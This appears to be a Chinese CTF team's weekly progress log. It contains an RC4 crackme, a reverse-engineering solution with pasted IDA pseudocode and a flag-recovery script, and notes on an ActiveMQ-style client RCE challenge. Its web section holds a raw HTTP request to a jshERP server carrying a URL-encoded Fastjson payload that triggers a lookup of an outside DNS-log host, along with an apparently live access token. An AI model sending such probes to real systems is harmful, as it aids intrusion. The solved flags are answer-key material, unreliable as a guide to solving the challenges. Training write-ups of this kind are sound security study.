#逆向RC4
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
typedef unsigned long ULONG;

void init(unsigned char *s, unsigned char *key, unsigned long Len) //初始化函数
{
    int i =0, j = 0;
    char k[256] = {0};
    unsigned char tmp = 0;
    for (i=0;i<256;i++) {
        s[i] = i;
        k[i] = key[i%Len];
    }
    for (i=0; i<256; i++) {
        j=(j+s[i]+k[i])%256;
        tmp = s[i];
        s[i] = s[j]; //交换s[i]和s[j]
        s[j] = tmp;
    }
 }

void crypt(unsigned char *s, unsigned char *Data, unsigned long Len) //加解密
{
    int i = 0, j = 0, t = 0;
    unsigned long k = 0;
    unsigned char tmp;
    for(k=0;k<Len;k++) {
        i=(i+1)%256;
        j=(j+s[i])%256;
        tmp = s[i];
        s[i] = s[j]; //交换s[x]和s[y]
        s[j] = tmp;
        t=(s[i]+s[j])%256;
        Data[k] ^= s[t];
     }
} 

int main()
{ 
        char i;
        int a = 0;
    unsigned char s[256] = {0}; //S-box
    char key[256] = {"12345678"};
    char pData[512] = {-17,-64,87,-117,125,-39,-18,-46,-59,114,100,-85,-7,8,105,-63,45,-22,-12,36,-84,27};
    char input[512] = {};
    ULONG len = strlen(pData);
    printf("please input your flag:\n");
           while((i = getchar())!='\n')
           {
                   input[a] = i;
                   a++;
           }
    init(s,(unsigned char *)key,strlen(key)); //已经完成了初始化
    crypt(s,(unsigned char *)pData,len);//加密

    if(!strcmp(input,pData))
            printf("Good!");
    else
            printf("ERROR!");
    return 0;
}

原文

https://gzyinfosec.feishu.cn/docx/JVqtdSF9CoB7IxxOVBWcDG0xnrd?from=from_copylink

时间进度

1月20日—1月28日

制定学习计划

C语言 · 启航

施行学习计划

设置学习打卡机制

22日晚观看赛前说明会

靶场试炼

安排任务

题目讲解

开发飞书机器人实现自动递交flag验证

RE手

逆向、汇编学习进展

PWN手

Pwn、Linux学习进展

暂时无法在飞书文档外展示此内容

召开一周总结

漏洞挖掘

发掘安卓底层漏洞,上报MISRC并获得致歉。

战队声望

在CTF知名网站获悉,GZYSEC排名

赛事状况

期间参加獬豸杯,据悉此次电子取证大赛由江西警察学院科技与信息安全系火炬木攻防实验室等单位主办

受长亭科技邀请参与 Real World CTF 6(th) 体验赛

EvilMQ

  1. 漏洞原理类似 ActiveMQ, 但是是 Client 端 RCE, 需要自己构造一个 Evil Server

https://exp10it.io/2023/10/apache-activemq-%E7%89%88%E6%9C%AC-5.18.3-rce-%E5%88%86%E6%9E%90/

  1. 几个关键点

https://github.com/apache/inlong/blob/9d745b8449b8f57573668d7c332a71179027be20/inlong-tubemq/tubemq-core/src/main/java/org/apache/inlong/tubemq/corerpc/netty/NettyClient.java#L349

https://github.com/apache/inlong/blob/master/inlong-tubemq/tubemq-core/src/main/java/org/apache/inlong/tubemq/corerpc/utils/MixUtils.java#L70

1月29日—2月4日

复现

搭建赛事复现环境

笔记

参与编写逆向笔记

Hgame

29日参与Hgame

西湖

30日参加西湖论剑大赛

RE

web

GET /jshERP-boot/user/list?search=%7b%22%40%74%79%70%65%22%3a%22%6a%61%76%61%2e%6e%65%74%2e%49%6e%65%74%34%41%64%64%72%65%73%73%22%2c%22%76%61%6c%22%3a%22%73%61%74%76%65%72%70%76%79%6e%2e%64%67%72%68%33%2e%63%6e%22%7d&column=createTime&order=desc&field=id,,,action,loginName,username,userType,roleName,orgAbr,leaderFlagStr,phonenum,userBlngOrgaDsplSeq,status&currentPage=1&pageSize=10 HTTP/1.1
Host: 1.14.108.193:31882
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0
Accept: application/json, text/plain, /
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
X-Access-Token: ea4b6df790ab427d9564d16cf7fee026_0
Connection: close
Referer: http://1.14.108.193:31882/system/user
Cookie: Hm_lvt_1cd9bcbaae133f03a6eb19da6579aaba=1706583502; Hm_lpvt_1cd9bcbaae133f03a6eb19da6579aaba=1706583724

测试赛

自建靶机:Web测试

2024.0xctf.org.cn

2月05日—2月11日

总结

自主学习总结

逆向手

「本周做的哪些事情【简要总结】

web基础的了解,汇编的了解,内存占用,C语言前八道二级设计题以及文件的打开,高级进阶函数和树的结构和堆栈,高数的前七章节的复习,西湖赛事题目的了解以及复盘虽然说现在还没怎么懂

PWN手

密码手

除夕红包赛

2月9日红包赛

代码能力测试

2月10日代码能力测试

2月12日—2月18日

铁人三项环境复现

2月15日根据铁人三项杯搭建环境复现

逆向

放入ida,发现众多函数,查找字符串定位函数。

v26 = 0;
  v4 = 1;
  v5 = 4;
  v6 = 14;
  v7 = 10;
  v8 = 5;
  v9 = 36;
  v10 = 23;
  v11 = 42;
  v12 = 13;
  v13 = 19;
  v14 = 28;
  v15 = 13;
  v16 = 27;
  v17 = 39;
  v18 = 48;
  v19 = 41;
  v20 = 42;
  v21 = 26;
  v22 = 20;
  v23 = 59;
  v24 = 4;
  v25 = 0;
  printf("please enter flag:");
  sub_411136();
  while ( 1 )
  {
    getch();
    v1 = sub_411136();
    v27[v26] = v1;
    if ( !v1 || v27[v26] == 13 )
      break;
    if ( v27[v26] == 8 )
    {
      printf("\b\b");
      sub_411136();
      --v26;
    }
    else
    {
      printf("%c", v27[v26]);
      sub_411136();
      ++v26;
    }
  }
  v3 = 0;
  for ( i = 0; i < 17; ++i )
  {
    if ( v27[i] != byte_415768[*(&v4 + i)] )//KfxEeft}f{gyrYgthtyhifsjei53UUrrr_t2cdsef66246087138\0087138
      v3 = 1;
  }
  if ( v28 != '1' || v29 != '0' || v30 != '2' || v31 != '4' || v32 != '}' )
    v3 = 1;
  v27[v26] = 0;
  printf("\r\n");v26 = 0;
  v4 = 1;
  v5 = 4;
  v6 = 14;
  v7 = 10;
  v8 = 5;
  v9 = 36;
  v10 = 23;
  v11 = 42;
  v12 = 13;
  v13 = 19;
  v14 = 28;
  v15 = 13;
  v16 = 27;
  v17 = 39;
  v18 = 48;
  v19 = 41;
  v20 = 42;
  v21 = 26;
  v22 = 20;
  v23 = 59;
  v24 = 4;
  v25 = 0;
  printf("please enter flag:");
  sub_411136();
  while ( 1 )
  {
    getch();
    v1 = sub_411136();
    v27[v26] = v1;
    if ( !v1 || v27[v26] == 13 )
      break;
    if ( v27[v26] == 8 )
    {
      printf("\b\b");
      sub_411136();
      --v26;
    }
    else
    {
      printf("%c", v27[v26]);
      sub_411136();
      ++v26;
    }
  }
  v3 = 0;
  for ( i = 0; i < 17; ++i )
  {
    if ( v27[i] != byte_415768[*(&v4 + i)] )//KfxEeft}f{gyrYgthtyhifsjei53UUrrr_t2cdsef66246087138\0087138
      v3 = 1;
  }
  if ( v28 != '1' || v29 != '0' || v30 != '2' || v31 != '4' || v32 != '}' )
    v3 = 1;
  v27[v26] = 0;
  printf("\r\n");

将字符串按照数组v4的数字取出与v27比较,如果相等,则success。

v4数组即最上方连续的一串整形变量,(1,4,14,10,5,36,23,42,13,19,28,13,27,39,48,41,42,26,20,59),相应的字符串为KfxEeft}f{gyrYgthtyhifsjei53UUrrr_t2cdsef66246087138\0087138,v27最后几位也就是1024},根据过程编写脚本。

flag = ''  
st = 'KfxEeft}f{gyrYgthtyhifsjei53UUrrr_t2cdsef66246087138\0087138'  
index = (1, 4, 14, 10, 5, 36, 23, 42, 13, 19, 28, 13, 27, 39, 48, 41, 42, 26, 20, 59)  
  
for n in range(0, 17):  
    flag = flag + st[index[n] - 1:index[n]]  
  
print(flag)

flag:KEY{e2s6ry3r5s8f61024}

研究C Sharp逆向工程

VNCTF

2月17日参加VNCTF

2月19日—2月25日

总结

  我最近自从西湖比完之后都是准备专升本的英语备考当中,从新概念一开始学起,每天背单词记笔记、听听力、默写单词、句子、回译文章,偶而也会打打一些热身赛CTF水水,最近还给他们安排了一下目标。

  目前的学习计划

  Re手

密码手

PWN手